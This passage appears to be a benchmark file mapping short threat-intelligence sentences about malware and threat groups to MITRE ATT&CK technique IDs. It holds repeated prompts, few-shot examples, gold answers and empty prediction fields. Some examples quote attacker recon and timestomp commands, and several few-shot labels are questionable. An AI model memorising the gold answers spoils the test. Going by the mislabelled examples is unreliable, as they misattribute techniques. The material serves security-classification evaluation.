"You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443\n\t - T1124: System Time Discovery\n- Text: APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.\n\t - T1087.001: Account Discovery - Local Account\n- Text: menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.\n\t - T1083: File and Directory Discovery\n", + "input": "During Operation Wocao, threat actors used the `time` command to retrieve the current time of a compromised system.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GoldMax has RSA-encrypted its communication with the C2 server.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: TAINTEDSCRIBE has used FakeTLS for session authentication.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: A variant uses fake TLS to communicate with the C2 server.\n\t - T1095: Non-Application Layer Protocol\n", + "input": "Grandoreiro can use SSL in C2 communication.", + "gold": "- T1573.002: Encrypted Channel - Asymmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The dropper installs the backdoor, sets its attributes to \u201chidden\u201d, and sets a random file date and time When the dropper installs the backdoor, it sets its attributes to \u201chidden\u201d and sets file date and time to random values using the touch command: touch \u2013t YYMMDDMM \u201c/path/filename\u201d > /dev/null\n\t - T1070.006: Indicator Removal - Timestomp\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n\t - T1124: System Time Discovery\n- Text: NativeZone has checked if Vmware or VirtualBox VM is running on a compromised host.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: POWRUNER may collect information on the victim's anti-virus software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "OopsIE checks to see if the system is configured with \"Daylight\" time and checks for a specific region to be set for the timezone.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Before writing a keystroke to the log, the malware obtains the current locale identifier using the \u2018GetKeyboardLayout\u2019 API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: Once the registry value is created, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system. This execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4\n\t - T1082: System Information Discovery\n\t - T1546.012: Event Triggered Execution - Image File Execution Options Injection\n- Text: Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082]) - Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083]) - Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001]) - Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057]) - Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner/User Discovery [T1033]) - Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217]) - Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016]) - Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012]) - Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010]) - Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087]) - Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049\n\t - T1083: File and Directory Discovery\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1033: System Owner/User Discovery\n\t - T1082: System Information Discovery\n\t - T1217: Browser Information Discovery\n", + "input": "Maze has checked the language of the infected system using the \"GetUSerDefaultUILanguage\" function.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.\n\t - T1571: Non-Standard Port\n- Text: Vasport creates a backdoor by making a connection using a HTTP POST.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.\n\t - T1008: Fallback Channels\n", + "input": "njRAT has used port 1177 for HTTP C2 communications.", + "gold": "- T1571: Non-Standard Port", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We observed the threat group issue the following commands: @echo off dir c:\\ >> %temp%\\download ipconfig /all >> %temp%\\download net user >> %temp%\\download net user /domain >> %temp%\\download ver >> %temp%\\download del %0 @echo off dir \"c:\\Documents and Settings\" >> %temp%\\download dir \"c:\\Program Files\\ \" >> %temp%\\download net start >> %temp%\\download net localgroup administrator >> %temp%\\download netstat -ano >> %temp%\\download These commands allow the threat group to gain information about the compromised computer and the network to which it belongs\n\t - T1007: System Service Discovery\n\t - T1105: Ingress Tool Transfer\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Chinese state-sponsored cyber actors have been observed: \uf0b7 Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI). \uf0b7 Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \uf0b7 Employing Python scripts to exploit vulnerable servers. \uf0b7 Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1059.006: Command and Scripting Interpreter - Python\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1059.008: Command and Scripting Interpreter - Network Device CLI\n- Text: Patchwork used Visual Basic Scripts (VBS) on victim machines.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Molerats used PowerShell implants on target machines.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.\n\t - T1005: Data from Local System\n- Text: Darkhotel malware can obtain system time from a compromised host.\n\t - T1124: System Time Discovery\n- Text: APT41 used the WMIEXEC utility to execute \"whoami\" commands on remote machines.\n\t - T1033: System Owner/User Discovery\n", + "input": "DarkWatchman can collect files from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sibot checked if the compromised system is configured to use proxies.\n\t - T1016: System Network Configuration Discovery\n- Text: Metamorfo has collected the hostname and operating system version from the compromised host.\n\t - T1082: System Information Discovery\n- Text: No matching sample found for T1592.003\n", + "input": "Sliver has the ability to gather network configuration information.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Saint Bot has used `regsvr32` to execute scripts.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: KONNI has used Rundll32 to execute its loader for privilege escalation purposes.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", + "input": "Mori can use `regsvr32.exe` for DLL execution.", + "gold": "- T1218.010: System Binary Proxy Execution - Regsvr32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion : 8 LED= 20160124 KILL Trojan disconnects from the IRC server and terminates itself RESET Trojan disconnects from the IRC server and runs the executable again OS Obtains the Windows version and responds to the C2 with the following message \u201cPRIVMSG :\u201d: Windows NT Windows 95 Windows 98 Windows ME Windows 2003 Windows XP Windows 7 Windows Vista Unkown os info !SH EXEC Not supported MD Creates a specified directory\n\t - T1106: Native API\n\t - T1010: Application Window Discovery\n- Text: ConnectWise can record video on remote hosts.\n\t - T1125: Video Capture\n", + "input": "Proton uses a keylogger to capture keystrokes.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mimikatz The threat actors also uploaded tools to scan for and exploit potential vulnerabilities in the network, such as the well-known SMB vulnerability patched in commonly exploited by EternalBlue to move laterally to other systems on the network.\n\t - T1046: Network Service Discovery\n- Text: uses scripts to enumerate IP ranges on the victim network. has also issued the command net view /domain to a implant to gather information about remote systems on the network.\n\t - T1018: Remote System Discovery\n- Text: Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation.\n\t - T1210: Exploitation of Remote Services\n", + "input": "Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.\n\t - T1112: Modify Registry\n- Text: Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Filename: impku.dat:schemas File size: 608854 bytes MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892 SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90 Notes: Alternate data stream (ADS) PNG file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n", + "input": "APT32's backdoor has modified the Windows Registry to store the backdoor's configuration.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT1 used publicly available malware for privilege escalation.\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1595: Active Scanning\n- Text: APT1 has registered hundreds of domains for use in operations.\n\t - T1583.001: Acquire Infrastructure - Domains\n", + "input": "Aquatic Panda has acquired and used njRAT in its operations.", + "gold": "- T1588.001: Obtain Capabilities - Malware", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: has gathered information about local network connections using .\n\t - T1049: System Network Connections Discovery\n", + "input": "GravityRAT uses WMI to check the BIOS and manufacturer information for strings like \"VMWare\", \"Virtual\", and \"XEN\" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ursnif has gathered information about running services.\n\t - T1007: System Service Discovery\n- Text: The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n", + "input": "HyperBro can list all services and their configurations.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.\n\t - T1584.001: Compromise Infrastructure - Domains\n\t - T1583.001: Acquire Infrastructure - Domains\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: PROMETHIUM has created self-signed digital certificates for use in HTTPS C2 traffic.\n\t - T1587.003: Develop Capabilities - Digital Certificates\n- Text: Threat Group-3390 has hosted malicious payloads on Dropbox.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "For C0011, Transparent Tribe registered domains likely designed to appear relevant to student targets in India.", + "gold": "- T1583.001: Acquire Infrastructure - Domains", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Turla has used compromised servers as infrastructure.\n\t - T1584.004: Compromise Infrastructure - Server\n- Text: Cobalt Strike was also used to continuously communicate with the main command-and-control (C&C) server.\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1583.004: Acquire Infrastructure - Server\n", + "input": "Silence has used scheduled tasks to stage its operation.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses the net user command.\n\t - T1087: Account Discovery\n- Text: Prior to privilege escalation, Egregor proceeds to Active Directory reconnaissance using tools such as Sharphound or AdFind. These tools are used to gather information about users, groups, computers, and so on\n\t - T1033: System Owner/User Discovery\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: ROADTools can enumerate Azure AD groups.\n\t - T1069.003: Permission Groups Discovery - Cloud Groups\n", + "input": "UNC2452 obtained a list of users and their roles from an Exchange server using \"Get-ManagementRoleAssignment\".", + "gold": "- T1087: Account Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GreyEnergy has used Tor relays for Command and Control servers.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: SombRAT can SSL encrypt C2 traffic.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: Command & Control The malware communicates with the Naver email platform in order to communicate with the operator\n\t - T1071: Application Layer Protocol\n", + "input": "Siloscape uses Tor to communicate with C2.", + "gold": "- T1090.003: Proxy - Multi-hop Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As described in the analysis of the group\u2019s previous macOS backdoor, a clientID is created. This identifier is the MD5 hash of the return value of one of the following commands\n\t - T1082: System Information Discovery\n- Text: It also has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware (example in Figure 6\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Examining the use of the unique user agents\u2019 strings over time shows that while previously only the Mozilla/5.0 user agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications\n\t - T1033: System Owner/User Discovery\n\t - T1543.001: Create or Modify System Process - Launch Agent\n", + "input": "WarzoneRAT can collect compromised host information, including OS version, PC name, RAM size, and CPU details.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Upon initial execution, the Windows Registry is checked to determine if DarkWatchman has already been installed. The malware stores its configuration in \u2018\\\\HKCU\\Software\\Microsoft\\Windows\\DWM\\\u2018, using registry keys that consist of a uid generated from the serial number of the C: drive and appended with a single digit or character. Installation is denoted by uid + 0 (eg: abc1230) \u2013 if the malware does not find a \u20181\u2018 flag in this key, it runs its install function\n\t - T1012: Query Registry\n- Text: Inception has enumerated installed software on compromised systems.\n\t - T1518: Software Discovery\n- Text: Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1124: System Time Discovery\n\t - T1497: Virtualization/Sandbox Evasion\n", + "input": "DarkWatchman can query the Registry to determine if it has already been installed on the system.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note\n\t - T1204.001: User Execution - Malicious Link\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: Once installed, JSSLoader provides the threat group with a backdoor to the victim\u2019s computer and the organization\n\t - T1204.002: User Execution - Malicious File\n\t - T1047: Windows Management Instrumentation\n- Text: Zirconium is using what are referred to as web bugs, or web beacons, tied to a domain they purchased and populated with content. Although the domain itself may not have malicious content, the web bug allows Zirconium to check if a user attempted to access the site\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Pony has attempted to lure targets into clicking links in spoofed emails from legitimate banks.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chaes has added persistence via the Registry key \"software\\microsoft\\windows\\currentversion\\run\\microsoft windows html help\".\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: RogueRobin establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Turla established persistence by adding a Shell value under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n", + "input": "Wizard Spider has established persistence via the Registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run and a shortcut within the startup folder.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Metamorfo has searched the compromised system for banking applications.\n\t - T1518: Software Discovery\n- Text: Attacker deception and attribution The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: If Shamoon cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.\n\t - T1078.002: Valid Accounts - Domain Accounts\n", + "input": "Operation Wocao has used PowerShell on compromised systems.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As the Top Twenty shows, DNSChanger is also widespread. There is actually a connection between Zlob and DNSChanger \u2013 we believe they were created by the same gang. Although DNSChanger underwent many changes during its lifespan, basically what it does is simply change the DNS servers from the user\u2019s computer to a set of two specific IP addresses. The IP addresses are selected from a huge pool and the variation comes in distributing thousand of different DNSChanger binaries, each one setting the DNS servers to distinct IP addresses. While changing the DNS servers may not be regarded as something seriously malicious, an attacker who achieves this can actually do a lot of harm \u2013 for instance, redirecting websites such as Amazon.com or Bank Of America to phishing installations almost entirely without any sign of warning to the user. To complicate removal, the most recent 